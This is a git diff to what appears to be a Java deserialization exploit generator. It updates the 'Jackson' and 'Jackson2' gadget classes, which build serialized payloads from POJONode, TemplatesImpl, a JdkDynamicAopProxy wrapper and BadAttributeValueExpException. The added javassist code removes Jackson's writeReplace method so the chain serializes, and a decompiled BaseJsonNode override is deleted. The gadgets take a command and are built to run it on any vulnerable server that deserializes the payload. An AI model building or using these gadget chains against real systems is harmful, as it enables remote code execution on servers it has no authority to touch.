diff --git a/src/main/java/com/fasterxml/jackson/databind/node/BaseJsonNode.java b/src/main/java/com/fasterxml/jackson/databind/node/BaseJsonNode.java
deleted file mode 100644
index f9af571..0000000
--- a/src/main/java/com/fasterxml/jackson/databind/node/BaseJsonNode.java
+++ /dev/null
@@ -1,68 +0,0 @@
-//
-// Source code recreated from a .class file by IntelliJ IDEA
-// (powered by FernFlower decompiler)
-//
-
-package com.fasterxml.jackson.databind.node;
-
-import com.fasterxml.jackson.core.JsonGenerator;
-import com.fasterxml.jackson.core.JsonParser;
-import com.fasterxml.jackson.core.JsonToken;
-import com.fasterxml.jackson.core.ObjectCodec;
-import com.fasterxml.jackson.databind.JsonNode;
-import com.fasterxml.jackson.databind.SerializerProvider;
-import com.fasterxml.jackson.databind.jsontype.TypeSerializer;
-import java.io.IOException;
-import java.io.Serializable;
-
-public abstract class BaseJsonNode extends JsonNode implements Serializable {
-    private static final long serialVersionUID = 1L;
-
-//    Object writeReplace() {
-//        return NodeSerialization.from(this);
-//    }
-
-    protected BaseJsonNode() {
-    }
-
-    public final JsonNode findPath(String fieldName) {
-        JsonNode value = this.findValue(fieldName);
-        return (JsonNode)(value == null ? MissingNode.getInstance() : value);
-    }
-
-    public abstract int hashCode();
-
-    public JsonNode required(String fieldName) {
-        return (JsonNode)this._reportRequiredViolation("Node of type `%s` has no fields", new Object[]{this.getClass().getSimpleName()});
-    }
-
-    public JsonNode required(int index) {
-        return (JsonNode)this._reportRequiredViolation("Node of type `%s` has no indexed values", new Object[]{this.getClass().getSimpleName()});
-    }
-
-    public JsonParser traverse() {
-        return new TreeTraversingParser(this);
-    }
-
-    public JsonParser traverse(ObjectCodec codec) {
-        return new TreeTraversingParser(this, codec);
-    }
-
-    public abstract JsonToken asToken();
-
-    public JsonParser.NumberType numberType() {
-        return null;
-    }
-
-    public abstract void serialize(JsonGenerator var1, SerializerProvider var2) throws IOException;
-
-    public abstract void serializeWithType(JsonGenerator var1, SerializerProvider var2, TypeSerializer var3) throws IOException;
-
-    public String toString() {
-        return InternalNodeMapper.nodeToString(this);
-    }
-
-    public String toPrettyString() {
-        return InternalNodeMapper.nodeToPrettyString(this);
-    }
-}
diff --git a/src/main/java/org/gadget/Jackson.java b/src/main/java/org/gadget/Jackson.java
index d802a00..4d5b49c 100644
--- a/src/main/java/org/gadget/Jackson.java
+++ b/src/main/java/org/gadget/Jackson.java
@@ -2,6 +2,9 @@
 
 import com.fasterxml.jackson.databind.node.POJONode;
 import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtMethod;
 import org.gadget.inter.Gadget;
 import org.util.TemplateUtils;
 
@@ -10,6 +13,12 @@
 
 public class Jackson implements Gadget {
     public Object getObject(String common) throws Exception {
+        ClassPool pool = ClassPool.getDefault();
+        CtClass ctClass0 = pool.get("com.fasterxml.jackson.databind.node.BaseJsonNode");
+        CtMethod writeReplace = ctClass0.getDeclaredMethod("writeReplace");
+        ctClass0.removeMethod(writeReplace);
+        ctClass0.toClass();
+
         TemplatesImpl template = TemplateUtils.getTemplate(common);
         POJONode node = new POJONode(template);
         BadAttributeValueExpException val = new BadAttributeValueExpException(null);
diff --git a/src/main/java/org/gadget/Jackson2.java b/src/main/java/org/gadget/Jackson2.java
index dff4182..e62aa7c 100644
--- a/src/main/java/org/gadget/Jackson2.java
+++ b/src/main/java/org/gadget/Jackson2.java
@@ -13,12 +13,12 @@
 public class Jackson2 implements Gadget {
     @Override
     public Object getObject(String command) throws Exception {
-//        ClassPool pool = ClassPool.getDefault();
-//        CtClass ctClass0 = pool.get("com.fasterxml.jackson.databind.node.BaseJsonNode");
-//        CtMethod writeReplace = ctClass0.getDeclaredMethod("writeReplace");
-//        ctClass0.removeMethod(writeReplace);
-//        ctClass0.toClass();
-        //利用 JdkDynamicAopProxy 进行封装使其稳定触发
+        ClassPool pool = ClassPool.getDefault();
+        CtClass ctClass0 = pool.get("com.fasterxml.jackson.databind.node.BaseJsonNode");
+        CtMethod writeReplace = ctClass0.getDeclaredMethod("writeReplace");
+        ctClass0.removeMethod(writeReplace);
+        ctClass0.toClass();
+//        利用 JdkDynamicAopProxy 进行封装使其稳定触发
         Class<?> clazz = Class.forName("org.springframework.aop.framework.JdkDynamicAopProxy");
         Constructor<?> cons = clazz.getDeclaredConstructor(AdvisedSupport.class);
         cons.setAccessible(true);
@@ -29,7 +29,7 @@ public Object getObject(String command) throws Exception {
         POJONode jsonNodes = new POJONode(proxyObj);
 
         BadAttributeValueExpException exp = new BadAttributeValueExpException(null);
-        Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
+        Field val = exp.getClass().getDeclaredField("val");
         val.setAccessible(true);
         val.set(exp,jsonNodes);
         return exp;